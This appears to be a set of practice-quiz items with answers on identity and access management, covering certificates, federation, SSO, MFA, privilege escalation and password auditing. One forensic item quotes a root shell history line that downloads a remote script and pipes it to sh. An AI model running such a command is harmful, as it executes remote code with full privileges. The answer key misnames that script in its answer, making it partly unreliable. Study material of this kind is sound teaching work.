Chapter 8: Identity and Access Management Security (IAM)
Which of the following would be good for multiple domains and subdomains? A single-use certificate A (SAN) certificate An organization certificate A wildcard certificate
A (SAN) certificate
Which of the following is an entity that issues digital certificates? CLR AIA CDP CA
A certificate authority (CA) is an entity that issues digital certificates.
Which of the following describes a credential stuffing attack? A hacker tries a list of passwords on a single site. A hacker tries a list of credentials on multiple sites. A hacker tires to gain elevated privileges on a network. A hacker tries to get a user to click on a malicious link.
A hacker tries a list of credentials on multiple sites. A hacker trying a list of credentials on multiple sites is a credential stuffing attack. This often works because users use the same password for multiple sites.
You are monitoring network activity and find that a user appears to be logging into the network and downloading files, even though you know that user is on vacation. Which kind of attack have you MOST likely experienced? A vertical privilege escalation attack A brute force attack A horizontal privilege escalation attack A password stuffing attack
A horizontal privilege escalation attack A horizontal attack is when a user pretends to be a similar user on the same network.
Which of the following BEST describes Central Policy? An access management strategy where an attribute is created for every element of an organization's operations. An access management strategy where people are granted privileges based on their role in the organization. An authentication process the requires two or more steps. A program that checks for the correct attributes in an attribute-based system
A program that checks for the correct attributes in an attribute-based system. Central Policy is a program that checks for the correct attributes in an attribute-based system.
Which of the following BEST describes a rainbow table? Information about an organization's information systems. A table of passwords and the computed matching hashes. Malware programs that generate a hash for the program. A tool that can be used to pull information from social media postings.
A table of passwords and the computed matching hashes.
Which of the following BEST describes horizontal escalation? An attacker trying to access a user on the same system. An attacker trying a list of common passwords one after another. An attacker using a list of hacked credentials on a variety of sites. An attacker trying to access someone with higher privileges.
An attacker trying to access a user on the same system. An attacker trying to access a user on the same system is called horizontal escalation.
Which of the following certification types has the lowest level of certificate assurance? Extended Organization Domain Single-Use
Domain Domain validation is the lowest level of assurance. It has a padlock icon next to the domain and does not assure the site actually belongs to the business.
Which of the following is an advantage of setting up a federation? Employees have easier onboarding. Users must enter a PIN. Your organization is assigned a set of attributes. There is a preset database of users and their login credentials.
Employees have easier onboarding. There are many advantages to setting up a federation arrangement that make business operations smoother and more secure. These include: Easier employee onboarding Simpler end user experience Better user management
Which of the following is an example of IAM? File editing Entering a PIN Job position Clearance level
Entering a PIN Identity and access management (IAM) is something you likely encounter in your day-to-day life. You use IAM when you: Enter a PIN Scan a fingerprint Log into a website
Which of the following validations require an extensive verification process, shows a padlock, business name, and country code? Domain Organization Alternative Extended
Extended An extended validation is the strongest level of assurance. It requires an extensive verification process and shows a padlock, business name, and country code.
Which of the following is a trust relationship that exists between different organizations or applications? Federation Multi-factor authentication Assertion Identity and access management
Federation
Which of the following would BEST describe a multi-domain/subject alternative certificate? Good for multiple domains but no subdomains Good for a domain and all its subdomains Only good for one domain or subdomain Good for multiple domains and subdomains at a time
Good for multiple domains and subdomains at a time
Each user on a network must have a unique digital identity. Which of the following is this known as? Central Policy Identity and access management (IAM) Role-based access control (RBAC) Attribute-based access control (ABAC)
Identity and access management (IAM) Each user on a network must have a unique digital identity. This is known as identity and access management (IAM).
Your company has had a problem with users getting hacked even though you have established strong password policies. What is the next logical step to increase your company's security? Train the employees on the different types of hackers. Implement two or more methods of authentication. Purchase new computers for all your employees. Revise your company's password policy.
Implement two or more methods of authentication.
When performing an investigation into an intrusion through a Linux box on your network, you find the following command in /root/.bash_history: curl http://5.6.7.8/~/324526.sh | /bin/sh. What did this command do? It executed the 324526.sh script on a shell on the remote host 5.6.7.8, compromising that remote host. It executed the 334526.sh script locally as the root user. It copied the contents of the 324526.sh script into a new file called curl.sh, saving it for later execution. It replaced the /bin/sh command with the contents of the 324526.sh command
It executed the 334526.sh script locally as the root user. This curl command is used to copy the contents from a remote location. In this case, it copied the web server at the IP address 5.6.7.8 to the local machine and ran it using /bin/sh. It ran as the root user since this was found in the .bash_history file in the /root directory.
Which of the following BEST describes an organization validation? It shows a padlock icon next to the domain name. It shows a padlock icon, business name, and country code. It shows a padlock icon next to the company's name. It does not assure the site actually belongs to the business.
It shows a padlock icon next to the company's name.
Which of the following is a good way to prevent privilege escalation attacks? Delete event logs. Limit privileges. Obtain administrative privileges. Run administrative commands.
Limit privileges. By limiting the number of people who have privileges, you can make it more difficult for hackers to find someone vulnerable to impersonate. It's also easier to monitor a smaller pool of users who have advanced privileges.
You entered your password on a website and are sent a code to your cell phone. Which of the following is this an example of? SP SSO MFA IDP
MFA
You are tasked with changing the certificate authority to require that all requests be placed in the pending state until processed by an administrator. You have started certsrv (the certificate authority console) and are looking at the certificate authority's properties. Which tab would you select to change the way certificate requests are handled? Auditing Security Policy Module Enrollment Agents
Policy Module
As you review your network's storage shares to ensure permissions have been securely defined, you come across the following list of users and permissions set to a share on one of your key storage locations. Two of the regular users should have Read and Write permissions (Bob Barker and Jennifer Banks). The two other individuals should not (Joseph Lange and Bob Marley), who were both given access during a specific project but should've had their Write permissions removed afterward. What is it called when permissions are given for a task but then never removed when they are no longer required? Account elevation Privilege creep Privilege elevation SAM database creep
Privilege creep The answer is privilege creep, which is the gradual accumulation of permissions beyond what a person requires to do their job.
Which of the following is a data protection approach that seeks to protect data at the file level? Central policy Privilege escalation Data loss prevention Rights management
Rights management
Which of the following allows users to sign into a single trusted account, such as Google or Facebook? SSO IDP SP SAML
Single sign-on (SSO) is a process that allows users to sign into a single trusted account, such as Google or Facebook.
Over time, changes in the way people use networks have complicated protecting a network against security threats. Which of the following trends has increased the need for security? (Select two.) Social networking Cloud computing Startup companies Privilege escalation Multi-factor authentication
Social networking Cloud computing
You are examining a company executive's laptop after they complained that someone was leaking confidential information to the internet. You type Ctrl+Alt+Shift+K and the following interface pops up. What has happened to the executive's machine? Someone has installed a web server that uploads all information from the laptop to Dropbox. The executive has a weak password and someone has guessed it. There is a Metasploit backdoor payload running on the computer. Someone has installed a keylogger on it.
Someone has installed a keylogger on it. The program displayed after pressing this key combination is called Refog. It is a keylogger. Someone has installed a keylogger on the machine and is capturing everything typed on the keyboard.
An attacker who gains access to your system can cause a lot of damage with a wide variety of malicious activities. Which of the following are malicious activities an attacker might use against your system? (Select two.) Save the event log. Steal confidential information. Limit user privileges. Access lower privilege users. Install malware on the system.
Steal confidential information. Install malware on the system.
Which of the following BEST describes a federation? -Determines the combination of attributes from users, objects, actions, and environment factors that are needed to perform any given action on a system. -Is an access management strategy where an attribute is created for every element of an organization's operations, such as for time, date, and location. -Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them. -Is made up of components that include a user's account name and all the other attributes needed to start a session for the user.
Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them. A federation stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them.
While performing a password audit on a Windows machine in your organization with L0phtCrack, you receive the following results. Based on what you see below, which two accounts should worry you the most? (Select two.) DefaultAccount Administrator Brandon Guest Mihai
The Administrator and Mihai accounts are most concerning. The Administrator account has full access to the machine and no password is currently set. The Mihai account has a simple password (apple) and was likely added as a user account on the system.
You have been asked to crack the password on a zip file for the CEO. The employee who sent it to the CEO told them the password over the phone, but the CEO forgot it, and the employee who knows the password is unavailable for the next week. You are using John the Ripper on Linux to recover the password. You transferred the file to your Linux machine and ensured that John the Ripper is installed, but you receive the following message. Which step did you skip? The hash has to be determined for the file. The only tools for password recovery on zip files run on Windows. The length of the password must be known. The encryption type has to be determined for the file.
The hash has to be determined for the file. John the Ripper does not crack encryption; it takes the hash of a file and tries specific characters against it to try to decipher the values. In other words, the correct answer is to determine the hash of the file so John the Ripper knows which methods to try.
A Windows web server that was reported as being compromised has been scanned, patched, and appears to be running properly with no indications that it is still compromised. The server is back in production, but users are complaining that they receive certificate errors when connecting to it. You did not perform the quarantine on the machine (a coworker did). They also performed the patching and scanning before putting it back to work in production. What might be causing the certificate errors? The server certificate was revoked since the private key may have been compromised. The server certificate has been moved to Pending Requests in the CA and not moved back. The web service is misconfigured. The server certificate was moved to Failed Requests in the CA until an audit can be made.
The server certificate was revoked since the private key may have been compromised. The most likely cause of this situation is that the coworker revoked the server certificate since the private key has probably been compromised.
You are testing for password vulnerability and used the command below to probe a Linux machine on your network. You then received the output below in return. Prior to the test, you scanned the IP to ensure that the SSH port was open. Now when you scan the same IP from a different machine, you see it's still open and that SSH connections are accepted from other IP addresses. Which of the following would MOST likely explain what has happened? The target server's firewall has stopped all traffic to prevent a security breach. The SSH service has stopped running to protect itself from the attack. The syntax is wrong and should include the "--time-delay 60" syntax. The target server is using Fail2Ban and has started refusing connections from the source
The target server is using Fail2Ban and has started refusing connections from the source IP address.
Which of the following BEST describes signing in without single sign-on? The website provides an extra layer of security to an account. The website uses more than one way to authenticate a user. The website must have its own database of user credentials. The website does not have to check its database for user credentials.
The website must have its own database of user credentials.
Which of the following BEST describes signing in with single sign-on? The website verifies the credentials in its database. The website uses more than one way to authenticate a user. The user is required to enter a security code. The website's authentication server verifies the credentials.
The website's authentication server verifies the credentials. With single sign-on, a website does not have to check its database for user credentials. It relies on a third party, such as Google or Facebook, for authentication.
An attacker has performed a privilege escalation attack on your system. Which of the following is MOST likely the goal behind this attack? To delete access to event logs. To limit user privileges. To check for system vulnerabilities. To lay a foundation for later.
To lay a foundation for later. Privilege escalation attacks are often laying the foundation for a larger cyberattack. They use these kinds of attacks so that they can have the proper privileges to carry out a successful breach.
While looking at user logs you notice a user has been accessing items they should not have rights to. After speaking to the user, you believe your system may have experienced an attack. Which type of attack has the system MOST likely experienced? Brute force attack Password stuffing Vertical privilege escalation Horizontal privilege escalation
Vertical privilege escalation This scenario is most likely a vertical privilege escalation attack. This type of attack deals with a user trying to get higher rights than they usually have.
You are working for a company that has one domain and multiple subdomains. Which certificate type would you need? Wildcard Single-use Multi-domain Organization
Wildcard
ou are monitoring your network's traffic, looking for signs of strange activity. After looking at the logs, you see that there was a recent spike in database read volume. Could this be a problem and why? Yes. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database. Incorrect answer: Yes. A spike in database read volume can show that someone is trying to use a brute force attack. No. A spike in database read volume is a normal occurrence that is not suspicious. No. A spike in database read volume is only a problem if it happens multiple times in a short period.
Yes. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database, which can be used to injure the organization.
You are looking through your network usage logs and notice logins from a variety of geographic locations that are far from where your employees usually log in. Could this be a problem and why? Yes. Logins from strange geographical locations can show that your own employees are trying to hack you. No. Logins from strange geographical locations often happen from employees working remotely. Yes. Logins from strange geographical locations can show that a hacker is trying to gain access from a remote location. No. Logins from strange geographical locations happen when data is sent to distant servers.
Yes. Logins from strange geographical locations can show that a hacker is trying to gain access from a remote location.
Your network has been subject to a variety of network attacks and you are currently monitoring the user logs for suspicious activity, yet further attacks are still occurring. Which additional step could you take to increase network security? You could regularly scan your system for vulnerabilities. You could obtain administrator privileges. You could grant users more privileges. You could regularly delete event logs.
You could regularly scan your system for vulnerabilities. You should regularly scan your system for vulnerabilities; this will help you understand how hackers are getting into your system.
A password spraying attack is MOST like which of the following attack types? a brute force attack a privilege escalation attack a directory traversal attack a phishing attack
a brute force attack
